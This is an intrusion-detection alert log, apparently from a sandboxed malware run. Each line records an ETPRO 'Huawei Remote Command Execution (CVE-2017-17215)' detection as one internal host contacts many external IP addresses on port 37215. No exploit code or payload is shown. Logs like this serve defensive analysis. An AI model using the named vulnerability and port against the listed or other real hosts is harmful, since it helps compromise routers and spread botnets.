                                            06/14/24-10:43:56.229320TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5636837215192.168.2.14197.89.68.180
                                            06/14/24-10:43:58.290089TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4364437215192.168.2.14197.69.11.42
                                            06/14/24-10:44:29.015084TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3737437215192.168.2.14156.48.81.6
                                            06/14/24-10:44:31.089675TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4255437215192.168.2.1441.215.228.137
                                            06/14/24-10:43:37.760077TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4896837215192.168.2.14197.122.200.220
                                            06/14/24-10:43:37.763022TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3886837215192.168.2.1441.35.249.57
                                            06/14/24-10:44:00.323352TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6018237215192.168.2.1441.9.118.166
                                            06/14/24-10:44:33.148456TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5145437215192.168.2.14156.205.176.128
                                            06/14/24-10:44:33.151575TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6012037215192.168.2.14197.240.53.92
                                            06/14/24-10:43:41.907329TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4686837215192.168.2.14156.154.111.51
                                            06/14/24-10:44:00.324821TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3915237215192.168.2.14156.124.160.138
                                            06/14/24-10:43:37.761215TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5916837215192.168.2.14197.94.166.201
                                            06/14/24-10:44:10.548606TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3598837215192.168.2.1441.36.156.119
                                            06/14/24-10:43:41.849322TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6079637215192.168.2.14197.34.129.85
                                            06/14/24-10:43:52.163258TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5071837215192.168.2.14156.1.221.115
                                            06/14/24-10:43:34.661762TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5578237215192.168.2.14197.172.100.117
                                            06/14/24-10:44:31.054474TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4369437215192.168.2.1441.219.118.25
                                            06/14/24-10:44:22.862158TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5941237215192.168.2.14197.169.175.11
                                            06/14/24-10:44:33.131190TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4405637215192.168.2.14197.155.223.203
                                            06/14/24-10:44:12.640589TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5350637215192.168.2.14156.7.104.177
                                            06/14/24-10:44:31.084082TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5498237215192.168.2.14197.135.39.78
                                            06/14/24-10:43:58.295328TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3797837215192.168.2.1441.117.109.171
                                            06/14/24-10:43:48.031610TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3635437215192.168.2.1441.39.73.212
                                            06/14/24-10:43:52.164881TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3399837215192.168.2.1441.229.6.167
                                            06/14/24-10:43:48.016541TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5145437215192.168.2.14197.31.162.68
                                            06/14/24-10:44:04.419619TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4741637215192.168.2.1441.6.244.25
                                            06/14/24-10:44:22.862379TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3909837215192.168.2.14197.161.88.230
                                            06/14/24-10:44:02.368013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4566637215192.168.2.1441.86.128.109
                                            06/14/24-10:43:39.790502TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6002437215192.168.2.14156.209.203.71
                                            06/14/24-10:44:08.502710TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5143437215192.168.2.14156.236.143.61
                                            06/14/24-10:44:02.368037TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5895437215192.168.2.14156.91.172.206
                                            06/14/24-10:44:10.565351TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4497437215192.168.2.14197.68.79.64
                                            06/14/24-10:44:18.779200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5599037215192.168.2.14197.20.44.95
                                            06/14/24-10:43:43.971201TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4343237215192.168.2.14156.208.132.69
                                            06/14/24-10:43:43.944719TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5538437215192.168.2.1441.183.185.219
                                            06/14/24-10:43:56.243306TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5721037215192.168.2.14197.94.192.90
                                            06/14/24-10:44:02.383949TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4411437215192.168.2.14156.45.14.174
                                            06/14/24-10:44:31.084031TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5388837215192.168.2.14197.6.32.153
                                            06/14/24-10:43:48.030299TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3661837215192.168.2.14197.221.76.19
                                            06/14/24-10:44:10.544007TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5142037215192.168.2.14197.118.206.101
                                            06/14/24-10:44:10.545237TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4914037215192.168.2.1441.132.146.201
                                            06/14/24-10:44:14.670251TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4965637215192.168.2.14197.164.3.32
                                            06/14/24-10:44:24.943725TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4666837215192.168.2.14156.48.51.225
                                            06/14/24-10:43:52.148956TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3720637215192.168.2.1441.242.245.179
                                            06/14/24-10:44:18.763700TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3374837215192.168.2.1441.74.33.63
                                            06/14/24-10:43:58.291315TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4509637215192.168.2.14197.150.141.224
                                            06/14/24-10:43:45.966326TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4444037215192.168.2.14156.251.77.78
                                            06/14/24-10:44:18.774863TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4089037215192.168.2.1441.91.197.212
                                            06/14/24-10:44:26.977118TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5712437215192.168.2.1441.150.13.125
                                            06/14/24-10:43:45.985364TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5780037215192.168.2.14156.225.54.5
                                            06/14/24-10:43:58.291228TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3355637215192.168.2.14197.24.143.107
                                            06/14/24-10:43:37.761807TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3848437215192.168.2.14197.94.214.237
                                            06/14/24-10:43:41.848784TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5799637215192.168.2.14156.76.123.118
                                            06/14/24-10:44:20.807550TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6000437215192.168.2.1441.243.86.239
                                            06/14/24-10:44:04.408526TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4059637215192.168.2.1441.217.175.224
                                            06/14/24-10:44:29.022812TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5709437215192.168.2.1441.225.39.199
                                            06/14/24-10:43:39.792724TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5580037215192.168.2.14197.227.123.140
                                            06/14/24-10:44:08.504166TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5064237215192.168.2.14197.184.70.176
                                            06/14/24-10:43:48.017857TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4372637215192.168.2.1441.207.17.243
                                            06/14/24-10:44:12.616226TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5421437215192.168.2.1441.189.67.15
                                            06/14/24-10:43:48.018092TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4302637215192.168.2.14197.157.153.35
                                            06/14/24-10:44:22.882736TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5568037215192.168.2.14197.183.99.9
                                            06/14/24-10:43:58.275695TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5630037215192.168.2.1441.236.169.89
                                            06/14/24-10:44:00.343325TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5266037215192.168.2.14156.207.4.137
                                            06/14/24-10:44:29.012663TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3768637215192.168.2.1441.72.252.78
                                            06/14/24-10:43:43.967797TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3300437215192.168.2.14156.209.38.133
                                            06/14/24-10:44:00.324725TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3971237215192.168.2.14197.104.65.201
                                            06/14/24-10:44:04.422844TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4182237215192.168.2.14197.63.83.29
                                            06/14/24-10:43:36.729360TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5577637215192.168.2.1441.198.192.16
                                            06/14/24-10:43:43.940345TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4437637215192.168.2.14156.213.3.247
                                            06/14/24-10:44:16.737590TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3484037215192.168.2.14197.231.24.65
                                            06/14/24-10:44:24.942702TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6037237215192.168.2.14156.121.173.127
                                            06/14/24-10:43:37.758837TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5025437215192.168.2.14197.41.53.1
                                            06/14/24-10:43:50.072725TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4372637215192.168.2.14197.55.174.44
                                            06/14/24-10:43:34.677183TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5798037215192.168.2.14197.50.119.185
                                            06/14/24-10:43:45.985429TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5471037215192.168.2.14197.122.9.210
                                            06/14/24-10:44:04.424258TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3357637215192.168.2.14156.212.114.203
                                            06/14/24-10:43:45.969529TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4635437215192.168.2.14197.41.250.156
                                            06/14/24-10:44:00.325748TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3612037215192.168.2.14197.36.66.198
                                            06/14/24-10:43:45.991672TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5045637215192.168.2.1441.80.114.7
                                            06/14/24-10:43:36.722553TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6044837215192.168.2.14156.28.121.91
                                            06/14/24-10:43:52.148861TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4612037215192.168.2.14156.183.113.170
                                            06/14/24-10:44:18.762106TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5061637215192.168.2.14197.189.202.208
                                            06/14/24-10:43:43.968638TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3586437215192.168.2.1441.115.100.90
                                            06/14/24-10:43:43.941962TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5392037215192.168.2.14156.53.72.143
                                            06/14/24-10:44:33.135194TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3878437215192.168.2.14156.117.166.51
                                            06/14/24-10:44:14.686691TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5296037215192.168.2.14156.235.187.201
                                            06/14/24-10:44:10.546729TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5455237215192.168.2.1441.151.45.197
                                            06/14/24-10:44:00.342985TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5395637215192.168.2.1441.163.16.74
                                            06/14/24-10:44:22.881708TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4141837215192.168.2.1441.78.193.11
                                            06/14/24-10:43:36.725407TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5174637215192.168.2.14156.244.250.131
                                            06/14/24-10:44:31.050793TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3491237215192.168.2.14197.79.154.119
                                            06/14/24-10:44:06.449240TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5954437215192.168.2.14197.183.213.30
                                            06/14/24-10:44:08.504869TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4549837215192.168.2.1441.11.99.99
                                            06/14/24-10:44:12.615208TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5662637215192.168.2.14156.44.169.184
                                            06/14/24-10:44:14.666730TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5249237215192.168.2.1441.198.121.150
                                            06/14/24-10:44:18.779005TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6003437215192.168.2.14156.11.81.99
                                            06/14/24-10:43:43.940636TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6084437215192.168.2.14197.59.250.220
                                            06/14/24-10:44:02.381745TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4979437215192.168.2.14197.28.246.205
                                            06/14/24-10:44:18.762143TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5015837215192.168.2.14156.17.174.180
                                            06/14/24-10:44:33.152028TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4188037215192.168.2.14156.105.162.43
                                            06/14/24-10:43:43.968191TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6073437215192.168.2.14197.129.4.242
                                            06/14/24-10:43:52.142947TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5541037215192.168.2.14197.82.80.37
                                            06/14/24-10:43:36.701415TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5983237215192.168.2.14156.108.233.166
                                            06/14/24-10:44:14.667466TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5302437215192.168.2.14156.165.64.208
                                            06/14/24-10:44:14.681890TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5021637215192.168.2.14197.13.75.125
                                            06/14/24-10:44:26.980214TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4710837215192.168.2.1441.209.159.211
                                            06/14/24-10:43:50.074277TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6070437215192.168.2.14197.124.177.92
                                            06/14/24-10:43:54.200187TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4881037215192.168.2.1441.174.175.221
                                            06/14/24-10:43:45.965879TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5581637215192.168.2.14156.201.53.67
                                            06/14/24-10:43:34.675803TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5545037215192.168.2.14197.136.147.208
                                            06/14/24-10:43:41.848007TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5131837215192.168.2.1441.159.22.203
                                            06/14/24-10:43:58.276326TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4796037215192.168.2.14197.40.27.31
                                            06/14/24-10:44:22.861383TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5073837215192.168.2.14156.164.75.79
                                            06/14/24-10:44:26.977861TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5903437215192.168.2.14156.214.228.118
                                            06/14/24-10:43:36.702313TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5591037215192.168.2.1441.157.209.94
                                            06/14/24-10:44:35.177865TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5172037215192.168.2.1441.104.19.45
                                            06/14/24-10:44:02.384585TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3534637215192.168.2.1441.31.108.24
                                            06/14/24-10:44:02.386174TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4912637215192.168.2.14156.84.68.123
                                            06/14/24-10:44:08.518168TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4147037215192.168.2.14197.119.41.200
                                            06/14/24-10:44:10.567315TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3834237215192.168.2.14197.161.54.147
                                            06/14/24-10:44:31.052252TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6086637215192.168.2.14156.94.130.243
                                            06/14/24-10:43:34.675324TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5196037215192.168.2.14197.168.230.94
                                            06/14/24-10:44:14.671313TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5650837215192.168.2.14156.27.186.13
                                            06/14/24-10:43:45.989842TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4519837215192.168.2.1441.224.92.33
                                            06/14/24-10:43:54.183893TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5369437215192.168.2.14156.149.243.124
                                            06/14/24-10:44:16.734696TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4242237215192.168.2.1441.127.113.202
                                            06/14/24-10:43:39.790892TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4316237215192.168.2.14156.249.23.235
                                            06/14/24-10:43:39.807388TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5231837215192.168.2.14197.151.44.186
                                            06/14/24-10:43:56.250855TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5491637215192.168.2.14156.255.238.28
                                            06/14/24-10:43:36.699175TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4740037215192.168.2.14197.235.203.125
                                            06/14/24-10:44:06.451222TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5780637215192.168.2.14197.10.130.92
                                            06/14/24-10:44:00.339678TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5299037215192.168.2.14197.138.103.237
                                            06/14/24-10:43:39.812828TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3593837215192.168.2.1441.129.238.136
                                            06/14/24-10:43:41.846879TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5928237215192.168.2.1441.141.32.32
                                            06/14/24-10:44:10.564979TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4040237215192.168.2.14197.10.174.76
                                            06/14/24-10:43:41.899180TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5869237215192.168.2.14156.26.158.207
                                            06/14/24-10:44:14.666573TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3566637215192.168.2.1441.232.149.139
                                            06/14/24-10:44:00.325408TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3897237215192.168.2.14156.234.8.214
                                            06/14/24-10:44:02.381474TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5732437215192.168.2.14156.223.115.29
                                            06/14/24-10:43:45.966095TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3539837215192.168.2.14156.161.151.175
                                            06/14/24-10:44:00.341374TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5102237215192.168.2.1441.11.106.140
                                            06/14/24-10:43:39.810699TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5825837215192.168.2.14197.193.48.140
                                            06/14/24-10:44:26.979805TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5938237215192.168.2.14156.31.146.22
                                            06/14/24-10:43:48.017387TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4121237215192.168.2.1441.252.118.77
                                            06/14/24-10:44:10.564534TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4434637215192.168.2.14156.121.145.30
                                            06/14/24-10:44:12.641522TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4643437215192.168.2.14197.231.164.228
                                            06/14/24-10:44:08.521546TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3575637215192.168.2.1441.194.48.33
                                            06/14/24-10:43:41.846642TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3725837215192.168.2.1441.187.117.105
                                            06/14/24-10:43:36.723855TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5485637215192.168.2.1441.224.251.84
                                            06/14/24-10:44:06.452610TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5614437215192.168.2.14156.10.221.124
                                            06/14/24-10:44:33.134193TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5764437215192.168.2.1441.111.38.15
                                            06/14/24-10:44:24.914268TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4654037215192.168.2.1441.130.166.155
                                            06/14/24-10:43:43.971362TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4502437215192.168.2.1441.78.153.28
                                            06/14/24-10:43:36.701973TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3806037215192.168.2.14197.69.102.240
                                            06/14/24-10:43:45.969655TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3714437215192.168.2.1441.179.181.176
                                            06/14/24-10:44:26.999920TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4455637215192.168.2.14197.121.54.225
                                            06/14/24-10:43:52.143523TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5106037215192.168.2.1441.237.136.184
                                            06/14/24-10:43:48.031868TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4155037215192.168.2.1441.102.175.107
                                            06/14/24-10:44:27.000494TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4133037215192.168.2.14156.157.23.63
                                            06/14/24-10:44:04.410428TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5912037215192.168.2.1441.232.224.12
                                            06/14/24-10:44:00.322043TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4139037215192.168.2.14156.157.6.97
                                            06/14/24-10:44:08.518363TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3603637215192.168.2.14156.83.183.214
                                            06/14/24-10:43:54.182180TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4216837215192.168.2.14156.156.84.225
                                            06/14/24-10:44:00.325235TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4094837215192.168.2.14197.213.252.178
                                            06/14/24-10:43:34.679704TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3904437215192.168.2.14156.86.255.150
                                            06/14/24-10:44:33.134998TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4704037215192.168.2.14197.52.123.16
                                            06/14/24-10:44:02.364623TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5277037215192.168.2.14197.200.132.189
                                            06/14/24-10:44:29.022201TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5980237215192.168.2.14156.186.207.242
                                            06/14/24-10:44:16.715763TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4145837215192.168.2.1441.38.187.64
                                            06/14/24-10:43:52.149626TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4239837215192.168.2.1441.238.52.154
                                            06/14/24-10:43:39.812290TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4748437215192.168.2.14197.133.122.60
                                            06/14/24-10:44:04.420690TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5500437215192.168.2.1441.186.25.122
                                            06/14/24-10:44:00.336824TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6014037215192.168.2.14156.107.248.249
                                            06/14/24-10:44:20.827476TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3677237215192.168.2.14197.231.236.45
                                            06/14/24-10:43:41.848840TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4794637215192.168.2.14156.187.105.241
                                            06/14/24-10:43:56.225596TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3958437215192.168.2.1441.154.3.51
                                            06/14/24-10:44:12.618204TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5177237215192.168.2.14197.156.199.5
                                            06/14/24-10:44:10.547466TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5772037215192.168.2.1441.74.217.92
                                            06/14/24-10:43:56.245902TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4852637215192.168.2.1441.38.44.59
                                            06/14/24-10:44:24.913739TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4431437215192.168.2.1441.245.168.129
                                            06/14/24-10:44:16.735393TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4160037215192.168.2.14156.245.49.216
                                            06/14/24-10:44:33.132992TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4223037215192.168.2.14156.225.66.159
                                            06/14/24-10:43:43.944112TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5727237215192.168.2.14197.53.234.207
                                            06/14/24-10:44:24.915559TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3566837215192.168.2.14156.129.99.137
                                            06/14/24-10:43:36.726886TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5157237215192.168.2.1441.160.46.91
                                            06/14/24-10:44:22.878243TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5705037215192.168.2.14197.212.248.63
                                            06/14/24-10:44:00.342950TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4239037215192.168.2.14156.226.3.199
                                            06/14/24-10:44:04.423654TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4117437215192.168.2.1441.96.10.0
